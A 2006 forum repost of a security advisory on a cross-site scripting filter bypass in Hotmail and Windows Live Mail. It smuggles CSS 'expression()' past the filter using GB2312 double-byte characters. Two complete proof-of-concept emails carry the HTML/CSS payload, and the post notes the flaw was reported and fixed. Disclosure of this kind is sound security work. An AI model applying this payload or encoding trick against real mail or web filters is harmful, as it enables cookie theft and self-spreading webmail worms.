alexcargo Posted November 7, 2006 Report Posted November 7, 2006 Introduction:Hotmail and Windows Live Mail are both web-based e-mail services by Microsoft. Details:Hotmail's filter identifies "expression()" syntax in a CSS attribute. According to Hasegawa Yosuke's post(http://archive.openmya.devnull.jp/2006.08/msg00369.html), in some character encodings(e.g. GB2312), we can substitute some special double-byte chars for the corresponding chars in "expression()". In this case, we can create a malformed CSS attribute, which Hotmail's filter fails to inspect and filter the "expression()" syntax.An example:Hotmail--------------------------------------------------MIME-Version: 1.0From: user<user@site.com>Content-Type: text/html; charset=GB2312Subject: example<img id='sss'><input id='ttt' value="javascript:alert('xss')"><span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.sss.src=document.all.ttt.value)">exploited</span>.--------------------------------------------------Windows Live Mail--------------------------------------------------MIME-Version: 1.0From: user<user@site.com>Content-Type: text/html; charset=GB2312Subject: example<img id='sss'><input id='ttt' value="javascript:alert('xss')"><span style="font-family:[ascii 163][asii 197]xpression[ascii 163][ascii 168]document.all.EC_sss.src=document.all.EC_ttt.value)">exploited</span>.--------------------------------------------------the injected code inside the CSS attribute is responsible for-Getting cookies.-Potential web-based e-mail worm.Vender status:Microsoft was notified on Sep 25th, 2006. The bug is now fixed. Original advisory:http://applesoup.googlepages.com/hotmail_xss.txt Quote
